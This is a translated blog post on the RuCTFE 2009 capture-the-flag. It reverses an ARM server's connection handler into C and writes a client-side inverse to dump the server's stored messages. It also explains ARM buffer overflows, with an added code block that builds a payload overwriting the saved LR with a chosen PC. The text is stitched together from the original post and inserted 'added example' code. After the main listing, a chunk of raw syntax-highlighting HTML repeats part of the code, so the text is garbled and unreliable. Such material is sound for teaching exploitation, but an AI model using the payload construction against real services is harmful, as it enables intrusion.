Baboon's Blog - Keyword - RuCTFE
2016-11-05T16:24:49+00:00
Baboon
ARM is fun
2009-11-08T18:35:00+00:00
2009-11-17T21:05:12+00:00
Baboon
ARM, Buffer Overflow, RuCTFE
<p>Hop hop hop</p>
<p>No more joking around, the avalanche of posts is on its way <img src="/themes/default/smilies/wink.png" alt=";)" class="smiley" /></p>
<p>Saturday night was CTF time with RuCTFE. I won't say much about this CTF, given that I understood absolutely NOTHING of what we were supposed to do (apart from some obscure business about <a href="http://ructf.org/e/2009/videos.html" hreflang="en">Russian dances</a> and <a href="http://scoreboard.ructf.org/" hreflang="en">services</a> to keep running...). Anyway, I still ended up finding my niche in team nibbles (20th out of 43, not glorious, but oh well) and I set about studying an ARM server running inside an Android emulator.</p>
<p>In this post we'll therefore look at the basics of ARM, how to reverse it effortlessly by decompiling it by hand, how the challenge could be validated, and finally how a buffer overflow could be exploited even though that wasn't the point of the challenge.</p>
<p>ARM is all cute and cuddly. It's supposed to be simple, since it's a RISC (reduced instruction set computer) architecture, but when you come across instructions like <em>STMFD SP!, {R4-R8,R10,LR}</em> or <em>SUB R0, R0, R3,LSL#4</em>, or a listing that looks like this:</p>
<pre>
LDR R3, =0xB896
MOV R1, R0,LSR#16
MUL R12, R1, R3
EOR R12, R12, R0
MOV R12, R12,LSL#16
MOV R3, R12,LSR#16
MOV R2, R3,LSL#13
SUB R2, R2, R3,LSL#2
RSB R2, R3, R2
MOV R2, R2,LSL#3
ADD R2, R2, R3
EOR R2, R2, R1
MOV R2, R2,LSL#16
MOV R3, R2,LSR#16
MOV R0, R3,LSL#9
SUB R0, R0, R3,LSL#7
RSB R0, R3, R0
MOV R1, R0,LSL#4
ADD R0, R0, R1
EOR R0, R0, R12,LSR#16
LDR R1, =0x4520
MOV R0, R0,LSL#16
MOV R0, R0,LSR#16
MUL R3, R0, R1
EOR R3, R3, R2,LSR#16
ORR R0, R0, R3,LSL#16
BX LR
</pre>
<p>well, it gets scary.</p>
<p>Yet once you're familiar with the format of ARM instructions, you realise they are very easily transcribable (I doubt that word exists, but anyway) into C.</p>
<p>The general format of an ARM instruction is the following:
Instruction destination, source1, [source2, [LSL/LSR #n]]</p>
<p>LSL and LSR shift source2 by n bits to the left (L) or to the right (R).</p>
<p>So SUB R0, R0, R3,LSL#4 is equivalent to r0 = r0 - (r3 << 4).</p>
<p>All that's left is to get familiar with ARM instructions such as:</p>
<ul>
<li>RSB: reverse subtract; instead of doing destination = source1 - source2, it does destination = source2 - source1</li>
<li>EOR: the equivalent of the XOR instruction in x86</li>
<li>STMFD: pushes a series of registers, the '!' meaning the stack pointer is updated afterwards</li>
<li>LDMFD: the inverse instruction (pops them back)</li>
<li>BL: the equivalent of call</li>
<li>BCC: the equivalent of the jcc instructions in x86</li>
<li>LDR: load register, assigns to the destination the DWORD pointed to by the source</li>
<li>STR: store register, writes the value of the register into the DWORD pointed to by the address operand</li>
</ul>
<p>Finally, you should know that ARM functions make very little use of the stack, or use it only to store arrays: the compiler has 13 general-purpose registers in which to do its computations and keep its variables, which makes analysing ARM code in IDA rather painful, since you can't rename a whole pile of stack variables the way you would in x86. Moreover, a function's return address is in theory not on the stack but in a register, r14 (LR in IDA), and a function doesn't return with a retn but by placing the value of LR directly into PC (r15, ARM's equivalent of eip), either with LDMFD if LR was saved on the stack (the pair <em>STMFD SP!, {R4-R12,LR}</em> [...] <em>LDMFD SP!, {R4-R12,PC}</em>, the equivalent of our <em>push ebx | push edi | push esi</em> [...] <em>pop esi | pop edi | pop ebx | retn</em>), or with the <em>BX LR</em> instruction.</p>
<p>Now let's move on to analysing the program:</p>
<p>APIs are not called directly but by executing the following instruction sequence:</p>
<pre>
ADR R12, X
ADD R12, R12, #0x1000
X:
LDR PC, [R12,#X2]!
</pre>
<p>Don't ask me why, I don't know. To find the APIs being called, you therefore just need to look at the address located at X+0x1000+X2; once that's done we see directly which APIs are called.</p>
<p>We thus quickly find that the routine executed on each connection, started with pthread_create, is located at 0x88C4. Now that we know what to study, we'll transcribe the code into C. A small note first:</p>
<p>the instruction sequence</p>
<pre>
MOV R3, R4,LSL#6
SUB R5, R3, R4,LSL#4
</pre>
<p>corresponds to the C code r5 = r4*0x30. It's a compiler optimisation, two shifts and a subtraction being cheaper than a multiplication, so we have:</p>
<p>r5 = (r4 << 6) - (r4 << 4) <=> r5 = r4*2^6 - r4*2^4 <=> r5 = r4 * (2^6 - 2^4) <=> r5 = r4*0x30</p>
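<p>As an added example (not code from the original post), here is a small table-driven interpreter for the handful of data-processing instructions used in the listing at the top of the post, written against the format just described (destination, source1, source2 with its optional LSL/LSR #n). It runs that listing and compares the result with the hand-transcribed c2 given further down, and also executes the MOV/SUB pair above to confirm r5 = r4*0x30. The record layout, the LDRI pseudo-op for LDR Rd, =imm and the uint32_t DWORD are this example's own assumptions.</p>

```c
#include <stdint.h>
#include <stdio.h>

typedef uint32_t DWORD;  /* the post's DWORD: one 32-bit ARM register */
enum opcode { LDRI, MOV, ADD, SUB, RSB, EOR, ORR, MUL };
enum shift  { NOSHIFT, LSL, LSR };

/* "Instruction destination, source1, [source2, [LSL/LSR #n]]" as one record.
 * MOV ignores rn; LDRI is our own name for "LDR Rd, =imm" (load a literal). */
struct insn { enum opcode op; int rd, rn, rm; enum shift sh; int n; DWORD imm; };

/* source2 with its optional shift applied */
static DWORD operand2(const DWORD *r, const struct insn *i) {
    DWORD v = r[i->rm];
    if (i->sh == LSL) return v << i->n;
    if (i->sh == LSR) return v >> i->n;
    return v;
}

/* Execute one instruction on the register file (32-bit wraparound, like the CPU). */
static void step(DWORD *r, const struct insn *i) {
    DWORD a = r[i->rn], b = operand2(r, i);
    switch (i->op) {
    case LDRI: r[i->rd] = i->imm; break;
    case MOV:  r[i->rd] = b;      break;
    case ADD:  r[i->rd] = a + b;  break;
    case SUB:  r[i->rd] = a - b;  break;
    case RSB:  r[i->rd] = b - a;  break;  /* reverse subtract: source2 - source1 */
    case EOR:  r[i->rd] = a ^ b;  break;
    case ORR:  r[i->rd] = a | b;  break;
    case MUL:  r[i->rd] = a * b;  break;
    }
}

/* The listing from the top of the post, one record per instruction (BX LR omitted). */
static const struct insn listing[] = {
    { LDRI,  3,  0,  0, NOSHIFT,  0, 0xB896 },  /* LDR R3, =0xB896        */
    { MOV,   1,  0,  0, LSR,     16, 0 },       /* MOV R1, R0,LSR#16      */
    { MUL,  12,  1,  3, NOSHIFT,  0, 0 },       /* MUL R12, R1, R3        */
    { EOR,  12, 12,  0, NOSHIFT,  0, 0 },       /* EOR R12, R12, R0       */
    { MOV,  12,  0, 12, LSL,     16, 0 },       /* MOV R12, R12,LSL#16    */
    { MOV,   3,  0, 12, LSR,     16, 0 },       /* MOV R3, R12,LSR#16     */
    { MOV,   2,  0,  3, LSL,     13, 0 },       /* MOV R2, R3,LSL#13      */
    { SUB,   2,  2,  3, LSL,      2, 0 },       /* SUB R2, R2, R3,LSL#2   */
    { RSB,   2,  3,  2, NOSHIFT,  0, 0 },       /* RSB R2, R3, R2         */
    { MOV,   2,  0,  2, LSL,      3, 0 },       /* MOV R2, R2,LSL#3       */
    { ADD,   2,  2,  3, NOSHIFT,  0, 0 },       /* ADD R2, R2, R3         */
    { EOR,   2,  2,  1, NOSHIFT,  0, 0 },       /* EOR R2, R2, R1         */
    { MOV,   2,  0,  2, LSL,     16, 0 },       /* MOV R2, R2,LSL#16      */
    { MOV,   3,  0,  2, LSR,     16, 0 },       /* MOV R3, R2,LSR#16      */
    { MOV,   0,  0,  3, LSL,      9, 0 },       /* MOV R0, R3,LSL#9       */
    { SUB,   0,  0,  3, LSL,      7, 0 },       /* SUB R0, R0, R3,LSL#7   */
    { RSB,   0,  3,  0, NOSHIFT,  0, 0 },       /* RSB R0, R3, R0         */
    { MOV,   1,  0,  0, LSL,      4, 0 },       /* MOV R1, R0,LSL#4       */
    { ADD,   0,  0,  1, NOSHIFT,  0, 0 },       /* ADD R0, R0, R1         */
    { EOR,   0,  0, 12, LSR,     16, 0 },       /* EOR R0, R0, R12,LSR#16 */
    { LDRI,  1,  0,  0, NOSHIFT,  0, 0x4520 },  /* LDR R1, =0x4520        */
    { MOV,   0,  0,  0, LSL,     16, 0 },       /* MOV R0, R0,LSL#16      */
    { MOV,   0,  0,  0, LSR,     16, 0 },       /* MOV R0, R0,LSR#16      */
    { MUL,   3,  0,  1, NOSHIFT,  0, 0 },       /* MUL R3, R0, R1         */
    { EOR,   3,  3,  2, LSR,     16, 0 },       /* EOR R3, R3, R2,LSR#16  */
    { ORR,   0,  0,  3, LSL,     16, 0 },       /* ORR R0, R0, R3,LSL#16  */
};
/* Run the listing with R0 = h (the argument) and return R0 (the value live at BX LR). */
static DWORD run_listing(DWORD h) {
    DWORD r[16] = {h};  /* R0 = h, every other register starts at 0 */
    size_t k;
    for (k = 0; k < sizeof listing / sizeof listing[0]; k++)
        step(r, &listing[k]);
    return r[0];
}

/* The post's hand transcription of the same listing (its c2), for comparison. */
static DWORD c2(DWORD h) {
    DWORD r3, r1, r12, r2, r0;
    r1 = h >> 16;
    r12 = ((0xB896 * r1) ^ h) << 16;
    r3 = r12 >> 16;
    r2 = (((((r3 << 13) - (r3 << 2) - r3) << 3) + r3) ^ r1) << 16;
    r3 = r2 >> 16;
    r0 = ((r3 << 9) - (r3 << 7)) - r3;
    r1 = r0 << 4;
    r0 = ((r1 + r0) ^ (r12 >> 16)) & 0xFFFF;
    r3 = (r0 * 0x4520) ^ (r2 >> 16);
    return r0 | (r3 << 16);
}

/* The post's shift-and-subtract multiply: MOV R3, R4,LSL#6 / SUB R5, R3, R4,LSL#4 */
static DWORD times_0x30(DWORD r4) {
    static const struct insn seq[2] = { { MOV, 3, 0, 4, LSL, 6, 0 }, { SUB, 5, 3, 4, LSL, 4, 0 } };
    DWORD r[16] = {0, 0, 0, 0, r4};  /* R4 = input */
    step(r, &seq[0]); step(r, &seq[1]);
    return r[5];  /* equals r4 * 0x30 modulo 2^32 */
}

int main(void) {
    printf("listing: %08x  c2: %08x  7*0x30: %u\n",
           run_listing(0xCAFEBABE), c2(0xCAFEBABE), times_0x30(7));
    return 0;
}
```

If the interpreter and c2 ever disagree on an input, the transcription (or the reading of an operand) is wrong, which is exactly the kind of slip hand-decompiling invites.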
<p>Let's move on to the code transcribed into C:</p>
<pre class="c">
/* Hand transcription of the server's per-connection code. DWORD is a 32-bit word,
 * as on the ARM target. Note: this crypt clashes with libc's crypt(3) declared in
 * unistd.h; rename it if you actually compile this. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

typedef uint32_t DWORD;
typedef DWORD *PDWORD;

/* Server globals as named in the transcription; the post does not show their layout.
 * From the loops below, magic holds 0x80 records of 0x30 bytes: a 0x10-byte key
 * followed by a 0x20-byte message. nbMess / nearIAT hold the current record index. */
extern char magic[0x80 * 0x30];
extern char MagicString[];
extern DWORD *nbMess;
extern DWORD *nearIAT;

/* decoding applied to each DWORD of an incoming request */
DWORD c1(DWORD d)
{
    DWORD a = d >> 16;
    DWORD b = ((a - 0x399A) ^ d) & 0xFFFF;
    DWORD c = b - 0x459A;
    DWORD e;

    a = (a ^ c) & 0xFFFF;
    e = ((a + 0x70FB) ^ b) & 0xFFFF;
    c = (e - 0x2520) ^ a;

    return e | (c << 16);
}

/* encoding applied to each DWORD of an outgoing reply (the listing at the top of the post) */
DWORD c2(DWORD h)
{
    DWORD r3, r1, r12, r2, r0;
    r1 = (h >> 16);
    r12 = ((0xB896 * r1) ^ h) << 16;
    r3 = r12 >> 16;
    r2 = (((((r3 << 13) - (r3 << 2) - r3) << 3) + r3) ^ r1) << 16;
    r3 = r2 >> 16;
    r0 = ((r3 << 9) - (r3 << 7)) - r3;
    r1 = r0 << 4;
    r0 = ((r1 + r0) ^ (r12 >> 16)) & 0xFFFF;
    r3 = (r0 * 0x4520) ^ (r2 >> 16);
    return r0 | (r3 << 16);
}

/* apply fun to every DWORD of buff */
void crypt(PDWORD buff, int size, DWORD (*fun)(DWORD))
{
    int i;

    for (i = 0; i < size/4; i++)
    {
        buff[i] = fun(buff[i]);
    }
}

/* routine at 0x88C4, started by pthread_create for each connection */
void serv(int* p_socket)
{
    int i, n;
    int socket = *p_socket;
    char buff[0x34];
    char buff2[0x20];

    /* read exactly 0x34 bytes (0x100 is MSG_WAITALL) */
    for (i = 0x34; i > 0; i -= n)
    {
        if (!(n = recv(socket, &buff[0x34-i], i, 0x100)))
        {
            close(socket);
            free(p_socket);
            return;
        }
    }

    crypt((PDWORD)buff, 0x34, c1);

    switch (*((PDWORD)buff))
    {
    case 0xCAFEBABE :
        /* store a new record and acknowledge */
        memcpy((*nbMess)*0x30 + magic, buff+4, 0x30);
        send(socket, MagicString + (*nearIAT)*0x30, 0x30, 0);
        *nearIAT = (*nbMess + 1) & 0x7F;
        break;
    case 0xBABECAFE :
        /* look the record up by its 0x10-byte key and send its message, encoded */
        for (i = 0; i != 0x80; i++)
        {
            if (!memcmp(magic + i*0x30, buff+4, 0x10))
            {
                memcpy(buff2, magic + i*0x30 + 0x10, 0x20);
                break;
            }
        }
        if (i == 0x80)
        {
            memcpy(buff2, magic + 0x10, 0x20);  /* size missing in the original listing; 0x20 assumed */
            break;
        }
        crypt((PDWORD)buff2, 0x20, c2);
        send(socket, buff2, 0x20, 0);
        break;
    case 0xBABEBABE :
        /* send every key, encoded */
        memcpy(buff2, magic, 0x10);
        crypt((PDWORD)buff2, 0x10, c2);
        send(socket, buff2, 0x10, 0);
        for (i = 1; i != 80; i++)
        {
            memcpy(buff2, magic + i*0x30, 0x10);
            crypt((PDWORD)buff2, 0x10, c2);
            send(socket, buff2, 0x10, 0);
        }
        break;
    }
    /* the listing is cut off here in the source */
}
style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #000000; font-weight: bold;">break</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">default</span> <span style="color: #66cc66;">:</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> crypt<span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>PDWORD<span style="color: #66cc66;">)</span>buff,0x34,c2<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> send<span style="color: #66cc66;">(</span>socket,buff,0x34,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span 
style="color: #000000; font-weight: bold;">break</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> shutdown<span style="color: #66cc66;">(</span>socket,<span style="color: #cc66cc;">2</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> close<span style="color: #66cc66;">(</span>socket<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> free<span style="color: #66cc66;">(</span>p_socket<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span>;</div></li></ol></pre>
<p>Received messages are decrypted with routine c1 (which we will reverse shortly <img src="/themes/default/smilies/wink.png" alt=";)" class="smiley" /> ).</p>
<p>magic is a buffer of 0x30*0x80 bytes holding the messages that were stored with the 0xCAFEBABE command; it can be dumped with the BABEBABE command, whose replies are encrypted with routine c2 before they are sent (note that the dump loop only sends the first 0x10 bytes of each 0x30-byte entry, the same 0x10 bytes the lookup above compares against buff+4). The goal of the challenge is to dump and then decrypt the stored messages to recover a flag, which then has to be submitted to the organizers.</p>
<p>To dump that buffer we therefore have to send a message starting with the DWORD 0xBABEBABE. Since the server runs c1 over whatever it receives, the client has to apply the inverse of c1 to what it sends, so that inverse is what we write first:</p>
<pre class="c">
DWORD d1(DWORD f)
{
    /* c1 mixes the two 16-bit halves of the DWORD with adds and xors; d1 undoes it
       step by step. Every intermediate is masked to 16 bits; a ends up as the high
       half and d as the low half of the result. */
    DWORD a, b, c, d, e;
    e = f &amp; 0xFFFF;
    c = (f &gt;&gt; 16) &amp; 0xFFFF;
    a = (c ^ (e - 0x2520)) &amp; 0xFFFF;
    b = (e ^ (a + 0x70FB)) &amp; 0xFFFF;
    c = b - 0x459A;
    a = (a ^ c) &amp; 0xFFFF;
    d = (b ^ (a - 0x399A)) &amp; 0xFFFF;
    return a &lt;&lt; 16 | d;
}
</pre>
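<p>As an added example (not code from the original post), the check worth running before anything is sent to the server: does d1 really invert c1? c1 itself is not listed on this page, so the block below rebuilds it by undoing d1 one step at a time (called c1_rebuilt here; it matches the server's routine only insofar as d1 is a correct inverse of it), verifies the round trip in both directions, and then builds the 0x34-byte dump request with every DWORD passed through d1. Two things are assumptions of mine rather than facts from the listing: crypt_dwords, which applies a routine to each DWORD of a buffer, is my reading of the listing's crypt(buf, len, fn), and the payload after the command DWORD is simply left zero.</p>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint32_t DWORD;

#define REQ_BYTES 0x34                 /* request size, from the listing's default case */
#define REQ_WORDS (REQ_BYTES / 4)

/* d1 as given in the post: the inverse of the server's receive routine c1.
   Every intermediate is reduced to 16 bits; a becomes the high half and
   d the low half of the result. */
DWORD d1(DWORD f)
{
    DWORD a, b, c, d, e;
    e = f & 0xFFFF;
    c = (f >> 16) & 0xFFFF;
    a = (c ^ (e - 0x2520)) & 0xFFFF;
    b = (e ^ (a + 0x70FB)) & 0xFFFF;
    c = b - 0x459A;
    a = (a ^ c) & 0xFFFF;
    d = (b ^ (a - 0x399A)) & 0xFFFF;
    return a << 16 | d;
}

/* Rebuilt forward routine: d1 undone one step at a time, in reverse order.
   The post does not list c1; this equals the server's c1 only if d1 above is
   a correct inverse of it, which is exactly what the round trip below checks. */
DWORD c1_rebuilt(DWORD x)
{
    DWORD a2 = x >> 16, d = x & 0xFFFF;
    DWORD b = (d ^ (a2 - 0x399A)) & 0xFFFF;   /* undo d  = b ^ (a2 - 0x399A) */
    DWORD a = (a2 ^ (b - 0x459A)) & 0xFFFF;   /* undo a2 = a ^ (b - 0x459A)  */
    DWORD e = (b ^ (a + 0x70FB)) & 0xFFFF;    /* undo b  = e ^ (a + 0x70FB)  */
    DWORD c = (a ^ (e - 0x2520)) & 0xFFFF;    /* undo a  = c ^ (e - 0x2520)  */
    return c << 16 | e;
}

/* Round trip in both directions over fixed values and an LCG sweep; returns 1
   when d1 and c1_rebuilt are mutual inverses on every value tried. */
int roundtrip_ok(void)
{
    static const DWORD fixed[] = { 0, 0xFFFFFFFF, 0xBABEBABE, 0xCAFEBABE, 0x00010000 };
    for (size_t i = 0; i < sizeof fixed / sizeof fixed[0]; i++)
        if (c1_rebuilt(d1(fixed[i])) != fixed[i] || d1(c1_rebuilt(fixed[i])) != fixed[i])
            return 0;
    DWORD x = 0x12345678;
    for (int i = 0; i < 200000; i++) {
        x = x * 1664525u + 1013904223u;         /* Numerical Recipes LCG, enough for a sweep */
        if (c1_rebuilt(d1(x)) != x || d1(c1_rebuilt(x)) != x)
            return 0;
    }
    return 1;
}

/* Assumed semantics of the listing's crypt(buf, len, fn): apply fn to each DWORD in place. */
void crypt_dwords(DWORD *buf, size_t nbytes, DWORD (*fn)(DWORD))
{
    for (size_t i = 0; i < nbytes / 4; i++)
        buf[i] = fn(buf[i]);
}

/* Build the dump request: command DWORD 0xBABEBABE, the rest zero (assumption),
   every DWORD passed through d1 so that the server's c1 restores the clear command. */
void build_dump_request(DWORD req[REQ_WORDS])
{
    memset(req, 0, REQ_BYTES);
    req[0] = 0xBABEBABE;
    crypt_dwords(req, REQ_BYTES, d1);
}

/* Simulate the server side: run c1 over the request and check what it sees. */
int dump_request_ok(void)
{
    DWORD req[REQ_WORDS], seen[REQ_WORDS];
    build_dump_request(req);
    memcpy(seen, req, REQ_BYTES);
    crypt_dwords(seen, REQ_BYTES, c1_rebuilt);
    if (seen[0] != 0xBABEBABE) return 0;
    for (size_t i = 1; i < REQ_WORDS; i++)
        if (seen[i] != 0) return 0;
    return 1;
}

int main(void)
{
    DWORD req[REQ_WORDS];
    build_dump_request(req);
    printf("round trip %s, request %s\n", roundtrip_ok() ? "ok" : "BROKEN",
           dump_request_ok() ? "ok" : "BROKEN");
    /* Bytes as they go on the wire: little-endian, as on the ARM/Android target. */
    for (size_t i = 0; i < REQ_WORDS; i++)
        printf("%02x %02x %02x %02x%s", req[i] & 0xFF, (req[i] >> 8) & 0xFF,
               (req[i] >> 16) & 0xFF, req[i] >> 24, i + 1 == REQ_WORDS ? "\n" : " ");
    return 0;
}
```

<p>With d1 as written, d1(0xBABEBABE) is 0xFA2BDA34, so the request starts with the bytes 34 da 2b fa on the wire. The round trip is the important part: an inverse that is off by one masking step still produces plausible-looking DWORDs, and the only symptom on the server side would be a reply from the default case instead of the dump.</p>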
<p>Next, the reply to that request has to be decrypted, which means writing the inverse of c2. That function is not directly invertible, it is more of a hash than a cipher, so I decided to simply bruteforce each DWORD (which takes quite a while...) with the following function:</p>
<pre class="c">
/* c2 is the server's hash-like routine, reversed from the binary (not reproduced here). */
DWORD c2(DWORD);

DWORD d2(DWORD h)
{
    DWORD solution = 0;
    /* do/while so that 0xFFFFFFFF is tried too (a "&lt; 0xFFFFFFFF" loop skips it).
       0xFFFFFFFF doubles as the "no preimage found" value, so a genuine preimage
       of that value cannot be told apart from a miss. If c2 is not injective, the
       first hit is not necessarily the DWORD that was originally stored. */
    do {
        if (c2(solution) == h)
            return solution;
    } while (++solution != 0);
    return 0xFFFFFFFF;
}
</pre>
<p>Not knowing that we were supposed to look for flags (strings in an odd format), I was searching for something like "passkey : ..." and so I did not validate this challenge :D</p>
<p>I then looked for a vulnerability, but the function was not exploitable... I will nevertheless briefly explain how a buffer overflow could be exploited in an ARM environment.</p>
<p>I said earlier that a function's return address is not stored on the stack but in a register. That is true for functions that call no other function, but only partly true for the rest. Since there is a single LR register, a function that calls a sub-function without first saving its LR gets it overwritten by the sub-function's return address, and the caller is out of luck. That is why a function that calls others saves LR on the stack in its prologue and pops it straight back into PC in its epilogue (the familiar pair <em>STMFD SP!, {R4-R12,LR}</em> [...] <em>LDMFD SP!, {R4-R12,PC}</em>). And that, of course, is where buffer overflow exploitation becomes possible: the saved LR sits on the stack, right above the local buffers.</p>
<p>It <em>suffices</em> to overwrite the saved LR with the address of our shellcode, or with the address of an instruction like <em>MOV PC, SP</em>, and the trick is done <img src="/themes/default/smilies/wink.png" alt=";)" class="smiley" /> (well, that is the theory; I do not really know whether that kind of instruction is as easy to find as <em>call esp</em> on x86)</p>
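<p>As an added example (not from the original post), a small C helper that turns the frame layout just described into concrete numbers: it parses an STMFD register list into the 16-bit mask the instruction itself encodes, counts the saved registers that sit between the buffer and the saved LR, and lays out the payload that lands the chosen address in the slot LDMFD will pop into PC. The register list, the 64-byte buffer and the target address are constructed inputs. It assumes the buffer is the lowest object in the frame, directly below the saved registers (any other locals above the buffer add to the distance), and that the address written into PC points at executable code: on a target with a non-executable stack that means existing code, not shellcode placed on the stack.</p>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>

/* Parse one register name: R0..R15, SP, LR or PC (case-insensitive). Advances *pp.
   Returns the register number, or -1 on anything else. */
static int parse_reg(const char **pp)
{
    const char *p = *pp;
    int r;
    while (*p == ' ') p++;
    if (toupper((unsigned char)p[0]) == 'R' && isdigit((unsigned char)p[1])) {
        char *end;
        long n = strtol(p + 1, &end, 10);
        if (n < 0 || n > 15) return -1;
        r = (int)n;
        p = end;
    } else if (toupper((unsigned char)p[0]) == 'S' && toupper((unsigned char)p[1]) == 'P') { r = 13; p += 2; }
    else if (toupper((unsigned char)p[0]) == 'L' && toupper((unsigned char)p[1]) == 'R') { r = 14; p += 2; }
    else if (toupper((unsigned char)p[0]) == 'P' && toupper((unsigned char)p[1]) == 'C') { r = 15; p += 2; }
    else return -1;
    while (*p == ' ') p++;
    *pp = p;
    return r;
}

/* Turn an STM/LDM register list such as "{R4-R12,LR}" into the 16-bit mask the
   instruction encodes (bit n set = Rn). Returns 0 on a malformed list. */
uint16_t parse_reglist(const char *s)
{
    uint16_t mask = 0;
    const char *p = strchr(s, '{');
    if (!p) return 0;
    p++;
    while (*p != '}') {
        int lo = parse_reg(&p), hi;
        if (lo < 0) return 0;
        hi = lo;
        if (*p == '-') {                 /* range Rlo-Rhi */
            p++;
            hi = parse_reg(&p);
            if (hi < lo) return 0;
        }
        for (int r = lo; r <= hi; r++) mask |= (uint16_t)(1u << r);
        if (*p == ',') p++;
        else if (*p != '}') return 0;
    }
    return mask;
}

/* Offset from the start of a stack buffer to the saved LR in a frame laid out as
       STMFD SP!, {<list>,LR}      ; prologue
       SUB   SP, SP, #locals       ; the buffer lives here, below the saved registers
   STMFD stores the listed registers at ascending addresses in ascending register
   order, so every register numbered below 14 sits between the buffer and LR.
   dist_to_saved_regs is the number of bytes from the buffer to the saved block
   (the buffer size plus any locals the compiler placed above it).
   Returns -1 when LR is not in the list: a leaf function keeps its return address
   in the register, and there is nothing on the stack to overwrite. */
long saved_lr_offset(const char *reglist, size_t dist_to_saved_regs)
{
    uint16_t mask = parse_reglist(reglist);
    size_t below_lr = 0;
    if (!(mask & (1u << 14))) return -1;
    for (int r = 0; r < 14; r++)
        if (mask & (1u << r)) below_lr++;
    return (long)dist_to_saved_regs + (long)(4 * below_lr);
}

/* Build the overflow payload: filler up to and over the saved registers (their
   values do not matter for the hijack), then the new PC in little-endian, which
   is what LDMFD SP!, {<list>,PC} will load. Returns the payload length, 0 on error. */
size_t build_payload(const char *reglist, size_t dist_to_saved_regs, uint32_t new_pc,
                     uint8_t *out, size_t cap)
{
    long off = saved_lr_offset(reglist, dist_to_saved_regs);
    if (off < 0 || (size_t)off + 4 > cap) return 0;
    memset(out, 'A', (size_t)off);
    out[off + 0] = (uint8_t)(new_pc & 0xFF);
    out[off + 1] = (uint8_t)(new_pc >> 8);
    out[off + 2] = (uint8_t)(new_pc >> 16);
    out[off + 3] = (uint8_t)(new_pc >> 24);
    return (size_t)off + 4;
}

uint8_t payload[256];   /* kept global so the result can be inspected after main() */

int main(void)
{
    /* Constructed example: a 64-byte buffer directly below STMFD SP!, {R4-R12,LR};
       0xDEADBEEF is a placeholder for the address we would actually want in PC. */
    size_t n = build_payload("{R4-R12,LR}", 64, 0xDEADBEEF, payload, sizeof payload);
    printf("saved LR at offset %ld, payload %zu bytes\n",
           saved_lr_offset("{R4-R12,LR}", 64), n);
    return 0;
}
```

<p>For the prologue quoted above and a 64-byte buffer the saved LR is 100 bytes in (64 for the buffer, then R4 to R12), so the payload is 104 bytes. Reading the register list off the real prologue matters more than it looks: a compiler that saves only {R4,LR} moves the slot by 32 bytes, and an overflow that stops short of it just corrupts callee-saved registers and the function returns normally.</p>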